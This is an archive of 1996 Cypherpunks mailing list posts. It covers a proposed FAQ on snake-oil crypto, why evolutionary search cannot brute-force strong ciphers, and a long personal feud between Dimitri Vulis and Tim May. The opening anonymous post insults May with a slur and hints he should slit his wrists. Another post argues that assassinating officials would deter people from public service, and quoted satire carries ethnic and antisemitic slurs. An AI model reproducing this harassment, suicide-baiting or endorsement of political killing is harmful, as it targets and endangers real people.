Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 22 Sep 1996 18:46:19 +0800
To: cypherpunks@toad.com
Subject: A daily word of caution regarding Tim C[ocksucker] May
Message-ID: <199609220838.BAA25391@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


`A pen is mightier than a sword', not to mention 
Tim C[ocksucker] May's pea-sized penis. He would be 
better served by a safety razor, possibly applied 
in a bathtub filled with warm water (something he 
has surely never been into).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Sep 1996 17:19:41 +0800
To: cypherpunks@toad.com
Subject: Re: timmy waxes a widdle on AP
In-Reply-To: <Pine.BSF.3.91.960922003553.469D-100000@mcfeely.bsfs.org>
Message-ID: <ZVaNuD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> I think it is more likely an us-vs.-them mentality, rather than the cost
> of educating the person in question. If someone much poorer than you is
> killed in a poor neighborhood, you don't feel as threatened - it is one
> of "them" - If someone of equal or greater socio-economic background
> suffers a violent death, you begin to think "it could happen to me, too."

I was reading the other day about the lessons learned from the one-time
tax refund in 1975. Most consumers realized that this is a one-time deal
and saved most of it, rather than spent it. On the other hand, after Reagan's
tax cuts the consumers spent much of their newly retained income because they
believed that the lower tax rate would continue for a few years.

Likewise once an occasional gubment official in Mexico is assassinated
often enough for the population to perceive public service as being a
hazardous profession, they'll have trouble recruiting the replacements.
Assassinations won't work as long as they're perceived by the public as
zero-probability events. The public perception depends on other factors
besides the numbers or the frequency of the hits.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 22 Sep 1996 18:53:18 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: Snake-Oil FAQ
In-Reply-To: <v03007808ae6a2dfa2a73@[206.170.115.3]>
Message-ID: <199609220854.DAA27487@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007808ae6a2dfa2a73@[206.170.115.3]>, on 09/21/96 at 04:47 PM,
   Lance Cottrell <loki@infonex.com> said:

>I am setting up just such a list. I plan to award products for both
>excellent and lousy crypto. This really should be a committee (yuch)
>effort, so if you would like to participate, please let me know.

I would be intrested in this. I would like to see the following information made
available for any product that made it on to the list:

Detailed listings of pro/cons of the product.

Contact with the authors & listing of any rebutials they may have for the cons.

A appendix to the list explaining why the individule points are a pro or a con for
crypto products.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 04:26:59 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <ae6acbab000210047c0c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:44 PM 9/22/96, Dale Thorn wrote:

>The basic outline for any products included (and don't forget, just
>getting included is some sort of endorsement, if you know what I mean)
>could be a feature/bug listing, using common crypto terminology, and
>could be followed by side-by-side argument paragraphs from the author
>and from a reputable review panel.
>
>The usefulness of the list would probably depend on:
>1. The participation of all those names people like to name-drop on this
>   forum.
>2. And/or the quality of the list itself if done without (1.) above.
>   In this latter case, it could still be useful, but the variances in
>   evaluation owing to personal bias would be difficult to overcome.

The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most
in need of it won't read it.

If those who post descriptions of their "Unbreakable Virtual Whammo-Matic
Really Complicated Transposition Cipher" have not bothered to read Schneier
or other basic texts on ciphers, why would they bother to read a Snake Oil
FAQ? This applies to their customers as well.

It doesn't take much reading of standard crypto books to learn why
historical codes and ciphers (and their reinvented modern variants) are
fundamentally weak, and subject to (usually rapid) breaking with high-speed
computers. Once this basic point is realized, all else follows.

In other words, there is really no meaningful target audience for a Snake
Oil FAQ. If it's just a quick effort, fine. But escalating it into a Major
Cypherpunks Project seems like wasted effort.

Just point people to Schneier's book and suggest they read and absorb the
first several chapters. Then, like the infamous fisherman, they'll be
equipped to understand why the Whammo-matic Really Complicated Cipher is
neither Virtually Unbreakable nor worthy of spending much time analyzing,
and why they should stick with modern ciphers and systems which have been
subjected to years of review and attempts to break them.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 06:35:16 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <ae6ae19801021004a3b2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 PM 9/22/96, Alan Olsen wrote:

>I agree that it will no change the glorified decoder ring salesmen, but it
>can have a positive effect on their customers.
>
>The FAQ has the ability to reach those who would not nessisarily read
>Schneier or any other large tome.

Really? You think someone thinking about buying a cryptographic product for
his company, for example, will read an obscure Snake Oil FAQ (even the name
presumes familiarity with why some products are "snake oil") while not
bothering to read the opening chapters of Denning, Schneier, Brassard, or
other such texts?

I'll address the issue of "the masses" below.

>Most of the people outside of this forum have some understanding of
>cryptography.  Most of that understanding is based on folklore and
>marketing hype.  If we do not take pains to educate them as to what real
>crypto is, then we might as well just sit here and prattle on about
>Assassination Politics and ad hominem.

My view is that people interested in buying and using crypto are either
bright enough to learn, or are not. A "Snake Oil FAQ" is largely
unnecessary, for either category. For the first, because they're bright.
For the second, because they're not.

>You seem to take a pretty negative attitude about what the general public
>can and cannot learn from.  If Cypherpunks do not help educate the masses,
>who will?  The snake oil salesmen?  The Government?  The masses themselves?
> They are not going to go out and buy a book intended for programmers.
>(And especially one that costs about $50.)  There are no "cryptography for
>dummies" books.  (At least none worth a damn.)

And just who are "the masses"? I've never cared for that term, and rarely
use it. But, for the sake of this discussion, just who might they be?

Our mothers and fathers who don't use computers? Our neighbors who maybe
have a Pentium at work but don't much use computers otherwise? The guy
buying a game machine for his kids at CompUSA? The average reader of
sci.crypt? (:-})

I believe there is no meaningful way to "reach the masses" until they first
show some interest in the subject. And once they do, there is a plethora of
ways to learn the basics of cryptography. Nearly all libraries have several
books, and nearly every bookstore I have seen has copies of Schneier.
Further, the various FAQs available already cover enough of the basics for
someone to know why, for example, a "virtual one-time pad, with keys issued
by our company" is patently bogus.

Again, if "Joe Average" hasn't encountered this sort of stuff, no "Snake
Oil FAQ" is likely to reach him.

I do think there's a potential "market" for such a Snake Oil FAQ: the
journalists who are looking for a pithy line to use in a review of "Super
Bass-O-Matic Virtual Decoder Ring."

But that's about the only market (or reader base) I see.

Have fun with it, just don't gull yourself into thinking it's something
"the masses" will read.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 22 Sep 1996 21:06:14 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <199609220708.AAA20288@dfw-ix2.ix.netcom.com>
Message-ID: <199609221056.FAA27889@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199609220708.AAA20288@dfw-ix2.ix.netcom.com>, on 09/22/96 at 12:09 AM,
   Bill Stewart <stewarts@ix.netcom.com> said:

>>If it could the US would have assasinated Saddam by now. It can't because it
>>is too difficult to find out where exactly a person will be. 

>It's perfectly doable, it's just not politically expedient.
>One reason is that if they kill Saddam, they no longer have an
>excuse to keep threatening and attacking Iraq and making themselves look good.
>Another is that National Leaders have a tacit understanding between themselves never
>to assassinate other politicians [well, hardly ever....] If you break the taboo,
>you're implicitly inviting everyone else
>to go gunning for you, and it's too easy to do if there are enough
>people who really want you dead, especially well-organized people
>like a foreign army or spy service.

>If the US _had_ really wanted to assassinate Saddam, they could have
>hired professionals to do the job (like Mossad.)  Instead they
>killed 200,000 other Iraqis, including civilians, draftees, and a
>few tens of thousands of real soldiers.

You need to take into account the politics of the region. With Saddam gone you have
created a power vaccume that Iran would be all to happy to fill. It was for this
reason that durring the Gulf War the US & its allias (European & Arab) did not go to
Bagdad. They mearly wanted to knock Saddam down a notch or two not take him out.

I will agree with you about the taboo on political assassinations. Even the Mossad
are not involved in assassination of government leaders (they keep such actions to
rather nasty terrorist). The assassinations of government leaders that have taken
place in the region have all been from citizens of their own country.



--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 07:48:07 +0800
To: jack <coderpunks@toad.com
Subject: Re: Evolving algorithm for faster brute force key searches?
Message-ID: <ae6af5030202100433cd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:01 PM 7/5/96, jack wrote:
>I got an idea last night, maybe this has already been thought of and
>tried, but I thought I would give a quick outline of the program I was
>thinking of:
>
>-Specify a maximum key size (assume 1024bits or something)
>-Start with an arbitrary key "aaaaaaaaaaaaaa"
>
>Start a loop
>
>-create five mutations of the key
>-use each key to try and decrypt a few bytes of the message
>-run a (or some) statistical analysis tests and come up with a value
>for how 'random' the decrypted bits are
>-Pick the key that produced the least random ouput

Schneier actually used my explanation of why this won't work in the Second
Edition of his book.

Basically, with any strong. modern cipher, there is no concept of "getting
closer" to a solution. Thus, the "fitness landscape" for a
brute-force-needed cipher looks like a flat plain (if portrayed in two
dimensions), with the solution/key being a single-point spike rising from
the plain. No hill-climber can find this spike except by landing right on
it, which means evolutionary programming, genetic algorithms, simulated
annealing, and neural net sorts of approaches are worthless.

With some weak ciphers, this might work. I think Schneier makes some
comments about who's looked at this. But weak ciphers are not too
interesting.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 22 Sep 1996 17:32:29 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Chris Adams clever frame ...er, flame
In-Reply-To: <19960922023806125.AAA206@GIGANTE>
Message-ID: <199609220739.BAA27973@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <19960922023806125.AAA206@GIGANTE>, on 09/21/96
   at 07:38 PM, Adamsc@io-online.com (Adamsc) said:


 You are being gently flamed because.

    well, I look at creative writing in a different light:

        a)  sarcasm is always in season
        b)  Dr. Dimitri is always an excellent target
        c)  if I had $10 for each sarcastic eoast in CP over the last
            3 years I could retire in the style of tcmay, rather than
            the restrained mode I am retired.
        d)  is there ever any dicussion on CP which does not flame
out?
        e)  your 'gentle flame' is a great idea.  is it copyrighted
        f)  CP charter was violated so often in last few years that I,

            and several others started a splinter for code only. if
you
            can't handle the fun, sign off...
        g)  CP's charm is it personalities

last, but least:

        h)  join the humour, or...  well, lighten-up.



   [X] you continued a boring useless stupid thread
    see item a) above


   [x] you repeatedly initiated incoherent, flaky, and mindless threads
    et tu. brute?


   [x] you posted a piece riddled with profanities
    I beg to differ with you!  since when is allusion or illusion
profane?


   [x] you posted some sort of crap that doesn't belong in this group]
    see a) above, *again*


   [x] you made a bigoted statement(s)
    hmmm, not on this one.  besides, since when have we advocated PC
speech


   [x] you repeatedly assumed unwarranted moral or intellectual superiority
    I stand far back in the line for honours on that one --maybe in
2002?


   [x] you are under the misapprehension that this group is your preserve
    yes! absolutely!  but, I share it with 1000+ others


   [x] you repeatedly shown lack of humor
    one man's "plum" is another man's "prune"


   [x] you are apparently under compulsion to post to every threat
    wrong! I trash 75% before opening!


   [?] you are posting an anonymous attack
    check the spook records listed under "Ace of Swords"


  >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<
    your pleasure is my pleasure.

--
  "He said, `You are as constant as a northern star,' and I said,
    `Constantly in the darkness ?  Where's that at ?'"
            --Joni Mitchell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 22 Sep 1996 21:29:28 +0800
To: cypherpunks@toad.com
Subject: Re: Timmy May's spam (Was: Re: CIA hacked)
In-Reply-To: <HsumuD8w165w@bwalk.dm.com>
Message-ID: <199609220707.IAA00335@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis <dlv@bwalk.dm.com> writes:
> You're right - the forwarding mechanism I've been using so far just yanks in
> the spam e-mail without any processing. I will henceforth
>  1) Put the words 'Tim', 'May', and 'spam' in the subject line

Guess that will help people kill file on that combination, rather than
on dlv@bwalk, which I suspect some may have done at this stage, and
hence not see the [NEWS] series, and any signal posts.

> > It would seem to me that the first insults were thrown by yourself,
> > and that your strange habit of bouncing all the fallout to the list is
> > perpetuating the problem.
> 
> No. Let me remind you the sequence of events, in chronological order:
> 
> 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know
> anything about crypto, and isn't interested in learning) started spamming
> this mailing list with political rants

I don't think this at all fair; if you've read his cyphernomicon, you
will see that he has a perfectly good understanding of crypto.  His
strong point as I see it however, is that he was one of the first to
think deeply about the implications of strong crypto, and document
this in a fairly comprehensive manner.  This is a central topic for
cypherpunks, after all: cypherpunks are trying to achieve poltical
ends via strong crypto, crypto isn't being discussed in isolation, as
a purely scientific endeavour.  sci.crypt with its charter is more
this.

Also, I would point out that you yourself don't restrict yourself to
purely crypto discussions (aside from this latest war), you for
instance recently discussed driving licenses in NY.  Not that I am
complaining, or think this is especially inappropriate, as the topic
of Chaumian credentials, and the current state of state mandated
credentials I consider on topic, but you are criticizing others for
analysing politics.  The [NEWS] series, also (I've already said I
consider these useful), are hardly pure discussion of crypto, if this
were your only concern.

> 2. Most people who used to discuss crypto work on this mailing list
> have unsubscribed.

True, and unfortunate.  coderpunks feels somewhat reminiscent of how
cypherpunks used to be in this regard, try subscribing to that, if you
are uninterested in political aspects, and have not already.  I
subscribe to both, because I think politics is also important, as well
as churning out code, and just read very selectively on cypherpunks.

> 3. I pointed out a few examples of Tim making factually bogus claims in
> his rants.
>
> 4. Tim got very angry at me and started flaming me. I ignored him.
> 
> 5. Tim posted a series of rants about me, attributing to me various
> nonsense I never said. I pointed out once that I never said it and
> then ignored him.

I wasn't paying attention when these alleged events took place, so I
can't really comment.  I was commenting more on the fallout.

> 6. Recently it came to my attention that Tim's been contacting off-list
> various people in the computer security field and "complaining" about
> the politically incorrect things that I supposedly say on the Internet
> - except that he made up most of the "things" he complained about.

I don't think it's near as serious as you are worrying about, all I
heard him say was something about not understanding the motive for the
(spit) stuff.  Hardly complaining, more a passing comment on your
posting style than a complaint of "political incorrectness".

> 7. At this point I pointed out quite publicly that he's a liar.
> 
> 8. Since that time, several friends of Tim May (or maybe Tim himself,
> using multiple accounts) have been sending me harrassing e-mail, often
> by quoting my own cypherpunks articles and adding an obscenity.

It appears that Chris Adams <adamsc@io-online.com> started this.  And
others confused by the quoting, presumed it was you.  (Especially
since the headers were yours, as you were forwarding them.)  Also the
fact that you were forwarding these emails probably would get you
complaints anyway, even if the quoting had made it clear what was
going on.

> 9. Tim himself continues flaming me and telling lies about me (see his
> recent rant with the subject "death threats").

I guess you mean the purely fictitious Valdimir G Nulis :-) A cross
between Vladimir Z Nuri (who many consider to be Detweiller) and
yourself.

I don't really see what you're complaining about: it's really oblique,
and tame compared to your recent perfectly direct, and somewhat crude
insults to Tim.

> And you see, Timmy May is an obsessive liar and a vindictive nutcase.

I don't see the liar, nor the nutcase. I haven't noticed him say
anything which I considered untrue, nor have any of his posts appeared
nutty.

> > If reporting to the list is accurate, I hear you have a PhD with a
> > subject related to crypto, so presumably you would have ample
> > knowledge to contribute technical crypto related thoughts.  I'm sure
> > people would be interested in anything along those lines you cared to
> > contribute, and your reputation would benefit,
> 
> I still hope to be able discuss crypto on this mailing list (yes, my Ph.D.
> thesis was about crypto), but I see two problems:
> 
> 1. A lot of people have already left this list, unwilling to be subjected
> to Tim May's rants, lies, and personal attacks. If I post something crypto-
> relevant to this mailing list, they won't see it.

The decision to keep the list open was made for reasons I agree with,
censoring people is not the way to promote open discussions.
Censoring people is something cypherpunks are strongly against in
other forums, so it would seem especially hypocritical for cypherpunks
to censor the list itself.

However the result isn't too pretty either.  But the only solution is
to just post signal.  Getting into what is turning into a spam bot war
doesn't solve a thing!

> 2. Here's an example of the net-abuse being perpetrated by Tim May and his
> merry gang of mailbombers. I posted some crypto-relevant wire clippings
> to this mailing list. Either Tim (using an alternate account) or some pal
> of his e-mailed it back to me with an obscenity appended.
> 
> ]From adamsc@io-online.com  Thu Sep 19 00:00:57 1996
        ^^^^^^^^^^^^^^^^^^^^
why is this in part of your own headers?

> ]Received: by bwalk.dm.com (1.65/waf)
> ]	via UUCP; Thu, 19 Sep 96 00:49:21 EDT
> ]From: Troy Varange <varange@crl.com>

and this too?  Is this as a result of threading, or are you quoting
part of another message?  Or is it a forgery?

> ]Subject: Re: [NEWS] Crypto-relevant wire clippings
> ]> [...]
> ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and
> ]> weapons to Los Angeles and other cities.
> ]>
> ]> Bachus told Waters the hearing wasn't motivated by politics and that he
> ]>
> ]> ---
> ]>
> ]> Dr.Dimitri Vulis KOTM
> ]Fuckhead.

If it is more widespread than those two, perhaps you are being
Detweilled?  He seems to enjoy that sort of thing.

> Is this any more readable? See, I put a ']' in front of the quoted material.

Yeah, great!  Only one more thing, use ellipses [...] to show large
volumes of stuff which isn't relevant to your current point, and your
quoting style is A1.  (eg most of the body of your quoted [NEWS] item
for the purposes of this discussion could have been ellipsed out).

Some friendly advice for you if you care to take it: if you care about
your reputation, I'd recommend dropping the Tim May is a liar, and the
crude insults, that should halt the recent drop in your reputation.
If you feel you have a legitimate complaint, you make your case better
by avoiding insults.  Also once things die down, or sooner (I'd prefer
sooner for the sake of my per second BT phone line charges :-), stop
forwarding any email to cypherpunks, and you're ready for some serious
crypto discussion.  The email forwarding is what seems to have caused
most complaints.

People do pay attention when positive contributions are made, for
instance I think I remember that you posted some time ago a way to
have two plausible decryptions for one cyphertext, to enable things
like duress keys, in terms of RSA.  The problem with this, however is
that RSA is currently very slow to use in its pure form for messages.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Sep 1996 01:04:52 +0800
To: cypherpunks@toad.com
Subject: Re: Timmy May's spam (Was: Re: CIA hacked)
In-Reply-To: <199609220707.IAA00335@server.test.net>
Message-ID: <Z3qNuD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back <aba@dcs.ex.ac.uk> writes:
> > > It would seem to me that the first insults were thrown by yourself,
> > > and that your strange habit of bouncing all the fallout to the list is
> > > perpetuating the problem.
> >
> > No. Let me remind you the sequence of events, in chronological order:
> >
> > 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know
> > anything about crypto, and isn't interested in learning) started spamming
> > this mailing list with political rants
>
> I don't think this at all fair; if you've read his cyphernomicon, you
> will see that he has a perfectly good understanding of crypto.  His

On the contrary. Timmy has only a passable understanding of some aspects of
public-key crypto. He knows nothing about symmetric crypto and conventional
attacks. He even argued that practitioners don't need to learn any crypto
outside of PKC. (One of the things I don't like about Americans in their
propensity to take pride in their ignorance and lack of education. :-)

> strong point as I see it however, is that he was one of the first to
> think deeply about the implications of strong crypto, and document
> this in a fairly comprehensive manner.  This is a central topic for
> cypherpunks, after all: cypherpunks are trying to achieve poltical
> ends via strong crypto, crypto isn't being discussed in isolation, as
> a purely scientific endeavour.  sci.crypt with its charter is more
> this.
>
> Also, I would point out that you yourself don't restrict yourself to
> purely crypto discussions (aside from this latest war), you for
> instance recently discussed driving licenses in NY.  Not that I am

Right - the discussion of drivers licences and other credentials is definitely
crypto-relevant. The discussion, e.g., of the ethics of mandatory insurance is
not. My notion of crypto-relevance is fairly broad. E.g. I find the
assassination politics discussion to be crypto-relevant and sometimes very
interesting, and I kicked the ass of Alan Olsen and a few other assholes who
tried to suppress it.

I am very much interesting not only in the technical discussion of crypto, but
also in the implication of its use, which would be off-topic for sci.crypt
(fwiw). There's a difference between discussing privacy and ranting about
unfair taxation of rich old farts like Timmy May.

> complaining, or think this is especially inappropriate, as the topic
> of Chaumian credentials, and the current state of state mandated
> credentials I consider on topic, but you are criticizing others for
> analysing politics.  The [NEWS] series, also (I've already said I
> consider these useful), are hardly pure discussion of crypto, if this
> were your only concern.

Really? I was trying to pull out only the stories which obvious crypto
relevance. I'd be curious to know some examples of what in these series you
consider not to be crypto-relevant. Perhaps I made a mistake somewhere. In
particular, I consider _any discussion of electronic cash or money laundering
to be crypto-relevant.

> > 2. Most people who used to discuss crypto work on this mailing list
> > have unsubscribed.
>
> True, and unfortunate.  coderpunks feels somewhat reminiscent of how
> cypherpunks used to be in this regard, try subscribing to that, if you
> are uninterested in political aspects, and have not already.  I
> subscribe to both, because I think politics is also important, as well
> as churning out code, and just read very selectively on cypherpunks.

I have been subscribed to coderpunks almost since its beginning. It has
some interesting discussion. Unfortunately most of the folks who left the
original cypherpunks have not re-subscribed to coderpunks.

> > 6. Recently it came to my attention that Tim's been contacting off-list
> > various people in the computer security field and "complaining" about
> > the politically incorrect things that I supposedly say on the Internet
> > - except that he made up most of the "things" he complained about.
>
> I don't think it's near as serious as you are worrying about, all I
> heard him say was something about not understanding the motive for the
> (spit) stuff.  Hardly complaining, more a passing comment on your
> posting style than a complaint of "political incorrectness".

I'm not "worried", since Timmy May has already earned the reputation of a
nutcase and a liar in these circles, and is hardly in a position to
"assassinate" anyone's character. However I am somewhat angry that several
people I respect approached me in a short period of time and said something to
the effect, "You know, Timmy May's been complaining to me about what you write
on the Internet." Subsequent investigation revealed that he's been complaining
not even about the things I did say (plenty of which are "politically
incorrect"), but about things Timmy May himself made up - see quotes below.

> > 8. Since that time, several friends of Tim May (or maybe Tim himself,
> > using multiple accounts) have been sending me harrassing e-mail, often
> > by quoting my own cypherpunks articles and adding an obscenity.
>
> It appears that Chris Adams <adamsc@io-online.com> started this.  And
> others confused by the quoting, presumed it was you.  (Especially
> since the headers were yours, as you were forwarding them.)  Also the
> fact that you were forwarding these emails probably would get you
> complaints anyway, even if the quoting had made it clear what was
> going on.

How do you know that "Chris Adams" is a real person separate from Timmy? I
rather doubt that someone other than Timmy himself would go into trouble
"defending" Timmy, let alone three separate people.

> > 9. Tim himself continues flaming me and telling lies about me (see his
> > recent rant with the subject "death threats").
>
> I guess you mean the purely fictitious Valdimir G Nulis :-) A cross
> between Vladimir Z Nuri (who many consider to be Detweiller) and
> yourself.

I've corresponded with L.D. and he's a very bright and knowledgeable
person. Timmy May lies when he claims that VZNuri (who's an idiot) could
possibly be his "tentacle". You really should get to know L.D. better
before you repeat the lies Timmy May spreads about him.

> I don't really see what you're complaining about: it's really oblique,
> and tame compared to your recent perfectly direct, and somewhat crude
> insults to Tim.
>
> > And you see, Timmy May is an obsessive liar and a vindictive nutcase.
>
> I don't see the liar, nor the nutcase. I haven't noticed him say
> anything which I considered untrue, nor have any of his posts appeared
> nutty.

I suspect that you haven't been following this discussion for long. Here's
a recent quote from myself:

]Despite the name, there's practically no crypto discussions on the list. A few
]weeks ago someone mentioned elliptic curves, and there was an outcry of how
]it's "off-topic". Instead the mailing list is flooded with rants and personal
]attacks from Tim May, who knows next to nothing about cryptography, and whose
]long-winded diatribes in support of child pornography, drugs, and Harry Browne
]have absolutely no crypto relevance. Tim's off-topic spews have driven Eric
]Hughes, John Gilmore, Rich Salz, and many other former valuable contributors
]off the mailing list. Today's Cypherpunks don't write code - they write lies
]and personal attacks. I'll quote a couple of Tim May's unprovoked personal
]attacks against me to illustrate the kind of traffic found on the Cypherpunks
]mailing list (as opposed to cryptography discussions):
]
]>Message-Id: <ae13272612021004e248@[205.199.118.202]>
]>To: ichudov@algebra.com (Igor Chudov)
]>From: tcmay@got.net (Timothy C. May)
]>Subject: Lying Purebred Sovok Tchurkas Write the History of the Net
]>Cc: cypherpunks@toad.com
]>
]>At 4:17 AM 7/18/96, Igor Chudov @ home wrote:
]>
]>>Knowing KGB habits as pertaining to releasing information to the public,
]>>I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and
]>>maybe 10% truth that was already publicly available.
]>>
]>>It is like buying a CDROM about the history of the Net from Dr. Grubor.
]>>Maybe it would be interesting and amusing, but not worth $120.
]>
]>NOW you tell me! I just shelled out $42 for "The History of the Net," by
]>Dr. John Grubor and Dr. Dmitri Vulis, 1996.
]>
]>And here I thought it was the real history of the Net, especially the part
]>about how "the dandruff-covered Peter Vorobieff (spit) conspired with the
]>purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew
]>cripples dying of AIDS in Sovok-controlled clinics."
]>
]>When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot,
]>I thought this was the actual truth. I guess not. Maybe Spafford is
]>actually Rabbi Ruthenberg.
]>
]>--Tim May
]>
]>(hint: this a satire, based on the writings of Vulis, who speaks of people
]>as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the
]>charming word "(spit)" after nearly every person he references.)
]
]I responded to Tom May stating that I've never called anybody a (t)churka (I'm
]not even quite sure who or what they are) and asked him to retract his false
]claims. Tim May never retracted, but continued to post more lies about me and
]to attribute to me various nonsense I never wrote. But Tim May's attempts at
]"character assassination" don't stop at the cypherpunks mailing list: recently
]three separate people whom I respect (unlike Tim May) and who work in the
]computer security field told me that Tim May has been complaining to them
]"off-list" about my submissions to the Cypherpunks mailing list.
]
]Here's another recent example of a personal attack Tim May posted to the list:
]
]>Message-Id: <ae5e09fb04021004c8e5@[207.167.93.63]>
]>Mime-Version: 1.0
]>Content-Type: text/plain; charset="us-ascii"
]>To: cypherpunks@toad.com
]>From: tcmay@got.net (Timothy C. May)
]>Subject: Reputation Systems in Action
]>Sender: owner-cypherpunks@toad.com
]>Precedence: bulk
]>
]>At 6:41 PM 9/11/96, paul@fatmans.demon.co.uk wrote:
]>>> tcmay@got.net (Timothy C. May) writes:
]>>> > As to "tasteless and insulting," a matter of personal perspective. I find
]>>> > it helpful to call a spade a spade, and others apparently do as well.
]>>> >
]>>>
]>>> Of course, Tim gets very uncomfortable when others call a spade a spade.
]>>
]>>
]>>This constant character assasination of Tim is getting rather boring,
]>>as far as I can see, and I read all of the posts on the list, he has
]>>done nothing more than ignore posts from these idiots, that is his
]>>choice and nothing to do with anyone else.
]>
]>But this latest episode illustrates the role of reputations. Namely, my own
]>reputation is not being harmed by bizarre commentaries from the Vulis-bot.
]>As its reputation is (apparently) pretty low, and associated with Serdar
]>Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity
]>can hardly "assassinate" my character.
]
]Again, Tim May is lying. I am not interested in "assassinating" his character.
]He is the one spreading lies about me and attributing to me various nonsense I
]never said. Tim May shows his true colors when he faults me for my defense of
]Serdar Argic's freedom of speech. Unfortunately, Serdar has been silent for
]over two years, but that doesn't stop censorous liars like Tim May from
]continuing their vendetta against those who defended free speech.
]
]>A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx,"
]>aka "Pablo Escobar," aka several other alternate personalities, wrote
]>dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc.
]>Did this have an effect on our reputations? Not to people I respected, of
